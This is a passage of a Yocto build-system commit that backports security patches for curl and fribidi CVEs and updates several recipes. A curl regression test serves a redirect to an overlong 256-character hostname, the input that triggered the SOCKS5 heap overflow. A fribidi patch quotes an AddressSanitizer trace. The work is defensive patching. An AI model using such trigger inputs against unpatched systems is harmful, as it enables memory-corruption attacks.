+ state(conn, SSH_SFTP_UPLOAD_INIT);
+ else {
+ if(sftp_scp->path[strlen(sftp_scp->path)-1] == '/')
+@@ -2366,7 +2366,7 @@ static CURLcode ssh_statemach_act(struct
+ break;
+ }
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ if(data->state.infilesize < 0) {
+ failf(data, "SCP requires a known file size for upload");
+ sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -2504,7 +2504,7 @@ static CURLcode ssh_statemach_act(struct
+ break;
+
+ case SSH_SCP_DONE:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SCP_SEND_EOF);
+ else
+ state(conn, SSH_SCP_CHANNEL_FREE);
diff --git a/meta/recipes-support/curl/curl/CVE-2023-32001.patch b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
new file mode 100644
index 0000000000..f533992bcd
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
@@ -0,0 +1,38 @@
+From 0c667188e0c6cda615a036b8a2b4125f2c404dde Mon Sep 17 00:00:00 2001
+From: SaltyMilk <soufiane.elmelcaoui@gmail.com>
+Date: Mon, 10 Jul 2023 21:43:28 +0200
+Subject: [PATCH] fopen: optimize
+
+Closes #11419
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/0c667188e0c6cda615a036b8a2b4125f2c404dde]
+CVE: CVE-2023-32001
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ lib/fopen.c | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+index c9c9e3d6e73a2..b6e3cadddef65 100644
+--- a/lib/fopen.c
++++ b/lib/fopen.c
+@@ -56,13 +56,13 @@ CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
+ int fd = -1;
+ *tempname = NULL;
+
+- if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
+- /* a non-regular file, fallback to direct fopen() */
+- *fh = fopen(filename, FOPEN_WRITETEXT);
+- if(*fh)
+- return CURLE_OK;
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(!*fh)
+ goto fail;
+- }
++ if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
++ return CURLE_OK;
++ fclose(*fh);
++ *fh = NULL;
+
+ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
+ if(result)
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38545.patch b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
new file mode 100644
index 0000000000..c6b6726886
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
@@ -0,0 +1,148 @@
+From 600a1caeb2312fdee5ef1caf7d613c12a8b2424a Mon Sep 17 00:00:00 2001
+From: Mike Crowe <mac@mcrowe.com>
+Date: Wed, 11 Oct 2023 20:50:28 +0100
+Subject: [PATCH] socks: return error if hostname too long for remote resolve
+To: libcurl development <curl-library@cool.haxx.se>
+
+Prior to this change the state machine attempted to change the remote
+resolve to a local resolve if the hostname was longer than 255
+characters. Unfortunately that did not work as intended and caused a
+security issue.
+
+Name resolvers cannot resolve hostnames longer than 255 characters.
+
+Bug: https://curl.se/docs/CVE-2023-38545.html
+
+Unfortunately CURLE_PROXY and CURLPX_LONG_HOSTNAME were introduced in
+7.73.0 so they can't be used in 7.69.1. Let's use
+CURLE_COULDNT_RESOLVE_HOST as the best available alternative and update
+the test appropriately.
+
+libcurl's test support has been improved considerably since 7.69.1 which
+means that the test must be modified to remove use of %VERSION and
+%TESTNUMBER and the stderr output can no longer be checked.
+
+CVE: CVE-2023-38545
+Upstream-Status: Backport [fb4415d8aee6c1045be932a34fe6107c2f5ed147]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/socks.c | 13 +++++----
+ tests/data/Makefile.inc | 2 +-
+ tests/data/test728 | 60 +++++++++++++++++++++++++++++++++++++++++
+ 3 files changed, 69 insertions(+), 6 deletions(-)
+ create mode 100644 tests/data/test728
+
+diff --git a/lib/socks.c b/lib/socks.c
+index 37099130e..f3bf40533 100644
+--- a/lib/socks.c
++++ b/lib/socks.c
+@@ -521,11 +521,14 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+ infof(conn->data, "SOCKS5: connecting to HTTP proxy %s port %d\n",
+ hostname, remote_port);
+
+- /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
++ /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet. */
+ if(!socks5_resolve_local && hostname_len > 255) {
+- infof(conn->data, "SOCKS5: server resolving disabled for hostnames of "
+- "length > 255 [actual len=%zu]\n", hostname_len);
+- socks5_resolve_local = TRUE;
++ failf(data, "SOCKS5: the destination hostname is too long to be "
++ "resolved remotely by the proxy.");
++ /* This version of libcurl doesn't have CURLE_PROXY and
++ * therefore CURLPX_LONG_HOSTNAME, so let's report the best we
++ * can. */
++ return CURLE_COULDNT_RESOLVE_HOST;
+ }
+
+ if(auth & ~(CURLAUTH_BASIC | CURLAUTH_GSSAPI))
+@@ -837,7 +840,7 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+
+ if(!socks5_resolve_local) {
+ socksreq[len++] = 3; /* ATYP: domain name = 3 */
+- socksreq[len++] = (char) hostname_len; /* one byte address length */
++ socksreq[len++] = (unsigned char) hostname_len; /* one byte length */
+ memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
+ len += hostname_len;
+ infof(data, "SOCKS5 connect to %s:%d (remotely resolved)\n",
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 3d8565c36..5ee2284ff 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -89,7 +89,7 @@ test662 test663 test664 test665 test666 test667 test668 \
+ test670 test671 test672 test673 \
+ \
+ test700 test701 test702 test703 test704 test705 test706 test707 test708 \
+-test709 test710 test711 test712 test713 test714 test715 test716 test717 \
++test709 test710 test711 test712 test713 test714 test715 test716 test717 test728 \
+ \
+ test800 test801 test802 test803 test804 test805 test806 test807 test808 \
+ test809 test810 test811 test812 test813 test814 test815 test816 test817 \
+diff --git a/tests/data/test728 b/tests/data/test728
+new file mode 100644
+index 000000000..7b1d8b2f3
+--- /dev/null
++++ b/tests/data/test728
+@@ -0,0 +1,60 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++HTTP GET
++SOCKS5
++SOCKS5h
++followlocation
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++# The hostname in this redirect is 256 characters and too long (> 255) for
++# SOCKS5 remote resolve. curl must return error CURLE_PROXY in this case.
++<data>
++HTTP/1.1 301 Moved Permanently
++Location: http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
++Content-Length: 0
++Connection: close
++
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++proxy
++</features>
++<server>
++http
++socks5
++</server>
++ <name>
++SOCKS5h with HTTP redirect to hostname too long
++ </name>
++ <command>
++--no-progress-meter --location --proxy socks5h://%HOSTIP:%SOCKSPORT http://%HOSTIP:%HTTPPORT/728
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<strip>
++^User-Agent:.*
++</strip>
++<protocol>
++GET /728 HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++Accept: */*
++
++</protocol>
++<errorcode>
++6
++</errorcode>
++</verify>
++</testcase>
+--
+2.39.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38546.patch b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
new file mode 100644
index 0000000000..30ef2fd038
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
@@ -0,0 +1,132 @@
+From 7b67721f12cbe6ed1a41e7332f3b5a7186a5e23f Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 14 Sep 2023 23:28:32 +0200
+Subject: [PATCH] cookie: remove unnecessary struct fields
+To: libcurl development <curl-library@cool.haxx.se>
+
+Plus: reduce the hash table size from 256 to 63. It seems unlikely to
+make much of a speed difference for most use cases but saves 1.5KB of
+data per instance.
+
+Closes #11862
+
+This patch taken from Debian's 7.64.0-4+deb10u7 package which applied with
+only a little fuzz.
+
+CVE: CVE-2023-38546
+Upstream-Status: Backport [61275672b46d9abb32857404]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/cookie.c | 13 +------------
+ lib/cookie.h | 7 ++-----
+ lib/easy.c | 4 +---
+ 3 files changed, 4 insertions(+), 20 deletions(-)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1c4..a378f28e1 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -114,7 +114,6 @@ static void freecookie(struct Cookie *co)
+ free(co->name);
+ free(co->value);
+ free(co->maxage);
+- free(co->version);
+ free(co);
+ }
+
+@@ -641,11 +640,7 @@ Curl_cookie_add(struct Curl_easy *data,
+ }
+ }
+ else if(strcasecompare("version", name)) {
+- strstore(&co->version, whatptr);
+- if(!co->version) {
+- badcookie = TRUE;
+- break;
+- }
++ /* just ignore */
+ }
+ else if(strcasecompare("max-age", name)) {
+ /* Defined in RFC2109:
+@@ -1042,7 +1037,6 @@ Curl_cookie_add(struct Curl_easy *data,
+ free(clist->path);
+ free(clist->spath);
+ free(clist->expirestr);
+- free(clist->version);
+ free(clist->maxage);
+
+ *clist = *co; /* then store all the new data */
+@@ -1111,9 +1105,6 @@ struct CookieInfo *Curl_cookie_init(struct Curl_easy *data,
+ c = calloc(1, sizeof(struct CookieInfo));
+ if(!c)
+ return NULL; /* failed to get memory */
+- c->filename = strdup(file?file:"none"); /* copy the name just in case */
+- if(!c->filename)
+- goto fail; /* failed to get memory */
+ }
+ else {
+ /* we got an already existing one, use that */
+@@ -1241,7 +1232,6 @@ static struct Cookie *dup_cookie(struct Cookie *src)
+ CLONE(name);
+ CLONE(value);
+ CLONE(maxage);
+- CLONE(version);
+ d->expires = src->expires;
+ d->tailmatch = src->tailmatch;
+ d->secure = src->secure;
+@@ -1457,7 +1447,6 @@ void Curl_cookie_cleanup(struct CookieInfo *c)
+ {
+ if(c) {
+ unsigned int i;
+- free(c->filename);
+ for(i = 0; i < COOKIE_HASH_SIZE; i++)
+ Curl_cookie_freelist(c->cookies[i]);
+ free(c); /* free the base struct as well */
+diff --git a/lib/cookie.h b/lib/cookie.h
+index b3865e601..2e667cda0 100644
+--- a/lib/cookie.h
++++ b/lib/cookie.h
+@@ -36,8 +36,6 @@ struct Cookie {
+ char *expirestr; /* the plain text version */
+ bool tailmatch; /* whether we do tail-matching of the domain name */
+
+- /* RFC 2109 keywords. Version=1 means 2109-compliant cookie sending */
+- char *version; /* Version = <value> */
+ char *maxage; /* Max-Age = <value> */
+
+ bool secure; /* whether the 'secure' keyword was used */
+@@ -54,15 +52,14 @@ struct Cookie {
+ #define COOKIE_PREFIX__SECURE (1<<0)
+ #define COOKIE_PREFIX__HOST (1<<1)
+
+-#define COOKIE_HASH_SIZE 256
++#define COOKIE_HASH_SIZE 63
+
+ struct CookieInfo {
+ /* linked list of cookies we know of */
+ struct Cookie *cookies[COOKIE_HASH_SIZE];
+
+- char *filename; /* file we read from/write to */
+ bool running; /* state info, for cookie adding information */
+- long numcookies; /* number of cookies in the "jar" */
++ int numcookies; /* number of cookies in the "jar" */
+ bool newsession; /* new session, discard session cookies on load */
+ int lastct; /* last creation-time used in the jar */
+ };
+diff --git a/lib/easy.c b/lib/easy.c
+index b648e80c1..cdca0fb03 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -840,9 +840,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+ if(data->cookies) {
+ /* If cookies are enabled in the parent handle, we enable them
+ in the clone as well! */
+- outcurl->cookies = Curl_cookie_init(data,
+- data->cookies->filename,
+- outcurl->cookies,
++ outcurl->cookies = Curl_cookie_init(data, NULL, outcurl->cookies,
+ data->set.cookiesession);
+ if(!outcurl->cookies)
+ goto fail;
+--
+2.39.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..c9677b6a84
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
+CVE: CVE-2023-46218
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.68.0-1ubuntu2.21.debian.tar.xz upstream https://github.com/curl/curl/commit/2b0994c29a721c91c57 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 23 Nov 2023 08:15:47 +0100
+Subject: [PATCH] cookie: lowercase the domain names before PSL checks
+
+Reported-by: Harry Sintonen
+
+Closes #12387
+---
+ lib/cookie.c | 24 ++++++++++++++++--------
+ 1 file changed, 16 insertions(+), 8 deletions(-)
+
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -967,15 +967,23 @@ Curl_cookie_add(struct Curl_easy *data,
+ #ifdef USE_LIBPSL
+ /* Check if the domain is a Public Suffix and if yes, ignore the cookie. */
+ if(domain && co->domain && !isip(co->domain)) {
+- const psl_ctx_t *psl = Curl_psl_use(data);
+- int acceptable;
+-
+- if(psl) {
+- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
+- Curl_psl_release(data);
++ bool acceptable = FALSE;
++ char lcase[256];
++ char lcookie[256];
++ size_t dlen = strlen(domain);
++ size_t clen = strlen(co->domain);
++ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
++ const psl_ctx_t *psl = Curl_psl_use(data);
++ if(psl) {
++ /* the PSL check requires lowercase domain name and pattern */
++ Curl_strntolower(lcase, domain, dlen + 1);
++ Curl_strntolower(lcookie, co->domain, clen + 1);
++ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
++ Curl_psl_release(data);
++ }
++ else
++ acceptable = !bad_domain(domain);
+ }
+- else
+- acceptable = !bad_domain(domain);
+
+ if(!acceptable) {
+ infof(data, "cookie '%s' dropped, domain '%s' must not "
diff --git a/meta/recipes-support/curl/curl/CVE-2024-2398.patch b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
new file mode 100644
index 0000000000..a3840336f0
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
@@ -0,0 +1,88 @@
+Backport of:
+
+From deca8039991886a559b67bcd6701db800a5cf764 Mon Sep 17 00:00:00 2001
+From: Stefan Eissing <stefan@eissing.org>
+Date: Wed, 6 Mar 2024 09:36:08 +0100
+Subject: [PATCH] http2: push headers better cleanup
+
+- provide common cleanup method for push headers
+
+Closes #13054
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2024-2398.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/deca8039991886a559b67bcd6701db800a5cf764]
+CVE: CVE-2024-2398
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/http2.c | 34 +++++++++++++++-------------------
+ 1 file changed, 15 insertions(+), 19 deletions(-)
+
+--- a/lib/http2.c
++++ b/lib/http2.c
+@@ -515,6 +515,15 @@ static struct Curl_easy *duphandle(struc
+ }
+
+
++static void free_push_headers(struct HTTP *stream)
++{
++ size_t i;
++ for(i = 0; i<stream->push_headers_used; i++)
++ free(stream->push_headers[i]);
++ Curl_safefree(stream->push_headers);
++ stream->push_headers_used = 0;
++}
++
+ static int push_promise(struct Curl_easy *data,
+ struct connectdata *conn,
+ const nghttp2_push_promise *frame)
+@@ -528,7 +537,6 @@ static int push_promise(struct Curl_easy
+ struct curl_pushheaders heads;
+ CURLMcode rc;
+ struct http_conn *httpc;
+- size_t i;
+ /* clone the parent */
+ struct Curl_easy *newhandle = duphandle(data);
+ if(!newhandle) {
+@@ -557,11 +565,7 @@ static int push_promise(struct Curl_easy
+ Curl_set_in_callback(data, false);
+
+ /* free the headers again */
+- for(i = 0; i<stream->push_headers_used; i++)
+- free(stream->push_headers[i]);
+- free(stream->push_headers);
+- stream->push_headers = NULL;
+- stream->push_headers_used = 0;
++ free_push_headers(stream);
+
+ if(rv) {
+ /* denied, kill off the new handle again */
+@@ -995,10 +999,10 @@ static int on_header(nghttp2_session *se
+ stream->push_headers_alloc) {
+ char **headp;
+ stream->push_headers_alloc *= 2;
+- headp = Curl_saferealloc(stream->push_headers,
+- stream->push_headers_alloc * sizeof(char *));
++ headp = realloc(stream->push_headers,
++ stream->push_headers_alloc * sizeof(char *));
+ if(!headp) {
+- stream->push_headers = NULL;
++ free_push_headers(stream);
+ return NGHTTP2_ERR_TEMPORAL_CALLBACK_FAILURE;
+ }
+ stream->push_headers = headp;
+@@ -1179,14 +1183,7 @@ void Curl_http2_done(struct Curl_easy *d
+ if(http->header_recvbuf) {
+ Curl_add_buffer_free(&http->header_recvbuf);
+ Curl_add_buffer_free(&http->trailer_recvbuf);
+- if(http->push_headers) {
+- /* if they weren't used and then freed before */
+- for(; http->push_headers_used > 0; --http->push_headers_used) {
+- free(http->push_headers[http->push_headers_used - 1]);
+- }
+- free(http->push_headers);
+- http->push_headers = NULL;
+- }
++ free_push_headers(http);
+ }
+
+ if(!httpc->h2) /* not HTTP/2 ? */
diff --git a/meta/recipes-support/curl/curl_7.69.1.bb b/meta/recipes-support/curl/curl_7.69.1.bb
index 239852db09..2f351d585a 100644
--- a/meta/recipes-support/curl/curl_7.69.1.bb
+++ b/meta/recipes-support/curl/curl_7.69.1.bb
@@ -1,4 +1,8 @@
SUMMARY = "Command line tool and library for client-side URL transfers"
+DESCRIPTION = "It uses URL syntax to transfer data to and from servers. \
+curl is a widely used because of its ability to be flexible and complete \
+complex tasks. For example, you can use curl for things like user authentication, \
+HTTP post, SSL connections, proxy support, FTP uploads, and more!"
HOMEPAGE = "http://curl.haxx.se/"
BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker"
SECTION = "console/network"
@@ -9,6 +13,52 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \
file://0001-replace-krb5-config-with-pkg-config.patch \
file://CVE-2020-8169.patch \
file://CVE-2020-8177.patch \
+ file://CVE-2020-8231.patch \
+ file://CVE-2020-8284.patch \
+ file://CVE-2020-8285.patch \
+ file://CVE-2020-8286.patch \
+ file://CVE-2021-22876.patch \
+ file://CVE-2021-22890.patch \
+ file://CVE-2021-22898.patch \
+ file://CVE-2021-22924.patch \
+ file://CVE-2021-22925.patch \
+ file://CVE-2021-22946-pre1.patch \
+ file://CVE-2021-22946.patch \
+ file://CVE-2021-22947.patch \
+ file://CVE-2022-27776.patch \
+ file://CVE-2022-27775.patch \
+ file://CVE-2022-22576.patch \
+ file://CVE-2022-27774-1.patch \
+ file://CVE-2022-27774-2.patch \
+ file://CVE-2022-27774-3.patch \
+ file://CVE-2022-27774-4.patch \
+ file://CVE-2022-27781.patch \
+ file://CVE-2022-27782-1.patch \
+ file://CVE-2022-27782-2.patch \
+ file://CVE-2022-32206.patch \
+ file://CVE-2022-32207.patch \
+ file://CVE-2022-32208.patch \
+ file://CVE-2022-35252.patch \
+ file://CVE-2022-32221.patch \
+ file://CVE-2022-35260.patch \
+ file://CVE-2022-43552.patch \
+ file://CVE-2023-23916.patch \
+ file://CVE-2023-27534-pre1.patch \
+ file://CVE-2023-27534.patch \
+ file://CVE-2023-27538.patch \
+ file://CVE-2023-27533.patch \
+ file://CVE-2023-27535-pre1.patch \
+ file://CVE-2023-27535.patch \
+ file://CVE-2023-27536.patch \
+ file://CVE-2023-28320.patch \
+ file://CVE-2023-28320-fol1.patch \
+ file://CVE-2023-32001.patch \
+ file://CVE-2023-38545.patch \
+ file://CVE-2023-38546.patch \
+ file://CVE-2023-28321.patch \
+ file://CVE-2023-28322.patch \
+ file://CVE-2023-46218.patch \
+ file://CVE-2024-2398.patch \
"
SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42"
@@ -16,6 +66,15 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5
# Curl has used many names over the years...
CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl"
+CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"
+
+# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897
+# and https://ubuntu.com/security/CVE-2021-22897
+# This CVE issue affects Windows only Hence whitelisting this CVE
+CVE_CHECK_WHITELIST += "CVE-2021-22897"
+
+# This CVE reports that apple had to upgrade curl because of other already reported CVEs
+CVE_CHECK_WHITELIST += "CVE-2023-42915"
inherit autotools pkgconfig binconfig multilib_header
diff --git a/meta/recipes-support/db/db_5.3.28.bb b/meta/recipes-support/db/db_5.3.28.bb
index 318efcb61d..b2ae98f05c 100644
--- a/meta/recipes-support/db/db_5.3.28.bb
+++ b/meta/recipes-support/db/db_5.3.28.bb
@@ -10,11 +10,12 @@
# same system at the same time if really necessary.
SECTION = "libs"
SUMMARY = "Berkeley Database v5"
+DESCRIPTION = "Provides the foundational storage services for your application, no matter how demanding and unique your requirements may seem to be"
HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html"
LICENSE = "Sleepycat"
RCONFLICTS_${PN} = "db3"
-CVE_PRODUCT = "oracle_berkeley_db"
+CVE_PRODUCT = "oracle_berkeley_db berkeley_db"
CVE_VERSION = "11.2.${PV}"
PR = "r1"
diff --git a/meta/recipes-support/debianutils/debianutils_4.9.1.bb b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
index 904c52780f..8603fecbd0 100644
--- a/meta/recipes-support/debianutils/debianutils_4.9.1.bb
+++ b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
@@ -1,4 +1,9 @@
SUMMARY = "Miscellaneous utilities specific to Debian"
+DESCRIPTION = "Provides a number of small utilities which are used \
+primarily by the installation scripts of Debian packages, although \
+you may use them directly. "
+HOMEPAGE = "https://packages.debian.org/sid/debianutils"
+BUGTRACKER = "https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=debianutils;dist=unstable"
SECTION = "base"
LICENSE = "GPLv2 & SMAIL_GPL"
LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f"
diff --git a/meta/recipes-support/diffoscope/diffoscope_136.bb b/meta/recipes-support/diffoscope/diffoscope_172.bb
index 3e3e1dfc00..b26713c47f 100644
--- a/meta/recipes-support/diffoscope/diffoscope_136.bb
+++ b/meta/recipes-support/diffoscope/diffoscope_172.bb
@@ -7,12 +7,19 @@ PYPI_PACKAGE = "diffoscope"
inherit pypi setuptools3
-SRC_URI[md5sum] = "c84d8d308a40176ba2f5dc4abdbf6f73"
-SRC_URI[sha256sum] = "0d6486d6eb6e0445ba21fee2e8bdd3a366ce786bfac98e00e5a95038b7815f15"
+SRC_URI[sha256sum] = "5ffe7f38555c6409bc7e7edc277ed77dd78641fe1306fc38d153dbbe445ddea4"
RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic"
# Dependencies don't build for musl
COMPATIBLE_HOST_libc-musl = 'null'
+do_install_append_class-native() {
+ create_wrapper ${D}${bindir}/diffoscope \
+ MAGIC=${STAGING_DIR_NATIVE}${datadir_native}/misc/magic.mgc \
+ RPM_CONFIGDIR=${STAGING_LIBDIR_NATIVE}/rpm \
+ LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE} \
+ RPM_ETCCONFIGDIR=${STAGING_DIR_NATIVE}
+}
+
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
index 1623285fd0..ea34e4c7a3 100644
--- a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
+++ b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
@@ -8,7 +8,7 @@ SECTION = "support"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32"
-SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix"
+SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))"
SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197"
diff --git a/meta/recipes-support/enchant/enchant2_2.2.8.bb b/meta/recipes-support/enchant/enchant2_2.2.8.bb
index 4ddbe55da5..7c624efea3 100644
--- a/meta/recipes-support/enchant/enchant2_2.2.8.bb
+++ b/meta/recipes-support/enchant/enchant2_2.2.8.bb
@@ -1,6 +1,9 @@
SUMMARY = "Enchant Spell checker API Library"
+DESCRIPTION = "A library (and command-line program) that wraps a number of \
+different spelling libraries and programs with a consistent interface."
SECTION = "libs"
HOMEPAGE = "https://abiword.github.io/enchant/"
+BUGTRACKER = "https://github.com/AbiWord/enchant/issues/"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
new file mode 100644
index 0000000000..8f2c2ade0e
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
@@ -0,0 +1,50 @@
+From ad3a19e6372b1e667128ed1ea2f49919884587e1 Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 17:30:12 +0900
+Subject: [PATCH] Fix the stack buffer overflow issue
+
+strlen() could returns 0. Without a conditional check for len,
+accessing S_ pointer with len - 1 may causes a stack buffer overflow.
+
+AddressSanitizer reports this like:
+==1219243==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdce043c1f at pc 0x000000403547 bp 0x7ffdce0
+43b30 sp 0x7ffdce043b28
+READ of size 1 at 0x7ffdce043c1f thread T0
+ #0 0x403546 in main ../bin/fribidi-main.c:393
+ #1 0x7f226804e58f in __libc_start_call_main (/lib64/libc.so.6+0x2d58f)
+ #2 0x7f226804e648 in __libc_start_main_impl (/lib64/libc.so.6+0x2d648)
+ #3 0x4036f4 in _start (/tmp/fribidi/build/bin/fribidi+0x4036f4)
+
+Address 0x7ffdce043c1f is located in stack of thread T0 at offset 63 in frame
+ #0 0x4022bf in main ../bin/fribidi-main.c:193
+
+ This frame has 5 object(s):
+ [32, 36) 'option_index' (line 233)
+ [48, 52) 'base' (line 386)
+ [64, 65064) 'S_' (line 375) <== Memory access at offset 63 underflows this variable
+ [65328, 130328) 'outstring' (line 385)
+ [130592, 390592) 'logical' (line 384)
+
+This fixes https://github.com/fribidi/fribidi/issues/181
+
+CVE: CVE-2022-25308
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/ad3a19e6372b1e667128ed1ea2f49919884587e1]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ bin/fribidi-main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/bin/fribidi-main.c b/bin/fribidi-main.c
+index 3cf9fe1..3ae4fb6 100644
+--- a/bin/fribidi-main.c
++++ b/bin/fribidi-main.c
+@@ -390,7 +390,7 @@ FRIBIDI_END_IGNORE_DEPRECATIONS
+ S_[sizeof (S_) - 1] = 0;
+ len = strlen (S_);
+ /* chop */
+- if (S_[len - 1] == '\n')
++ if (len > 0 && S_[len - 1] == '\n')
+ {
+ len--;
+ S_[len] = '\0';
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
new file mode 100644
index 0000000000..0efba3d05c
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
@@ -0,0 +1,31 @@
+From f22593b82b5d1668d1997dbccd10a9c31ffea3b3 Mon Sep 17 00:00:00 2001
+From: Dov Grobgeld <dov.grobgeld@gmail.com>
+Date: Fri, 25 Mar 2022 09:09:49 +0300
+Subject: [PATCH] Protected against garbage in the CapRTL encoder
+
+CVE: CVE-2022-25309
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi-char-sets-cap-rtl.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/fribidi-char-sets-cap-rtl.c b/lib/fribidi-char-sets-cap-rtl.c
+index b0c0e4a..f74e010 100644
+--- a/lib/fribidi-char-sets-cap-rtl.c
++++ b/lib/fribidi-char-sets-cap-rtl.c
+@@ -232,7 +232,12 @@ fribidi_cap_rtl_to_unicode (
+ }
+ }
+ else
+- us[j++] = caprtl_to_unicode[(int) s[i]];
++ {
++ if ((int)s[i] < 0)
